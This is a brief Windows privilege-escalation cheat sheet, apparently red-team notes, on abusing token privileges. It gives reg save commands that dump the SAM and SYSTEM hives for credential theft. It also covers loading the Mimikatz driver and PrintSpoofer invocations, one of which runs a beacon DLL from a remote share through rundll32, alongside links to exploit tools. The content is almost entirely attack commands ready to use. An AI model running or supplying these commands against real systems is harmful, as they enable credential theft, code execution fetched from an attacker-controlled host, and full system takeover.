Privilege abuse

Ressource

• https://github.com/decoder-it/whoami-priv/raw/master/whoamipriv.pdf
• https://github.com/gtworek/Priv2Admin

SeBackupPrivilege

reg save HKLM\SYSTEM c:\temp\system.hive
reg save HKLM\SAM c:\temp\sam.hive

SeLoadDriverPrivilege

You can load the mimidrv using !+ in Mimikatz. Remember to clean after yourself !-.

SeImpersonatePrivilege

Windows 10 - Server 2016 / 2019

• https://github.com/itm4n/PrintSpoofer

PrintSpoofer64.exe -c "rundll32 \\<hostname>\<share>\<beacon.dll,Start>"

PrintSpoofer64.exe -i -c powershell (interactive shell)

Older systems

• https://cs.piosky.fr/post-exploit/windows/privesc/exploits/#ms16-075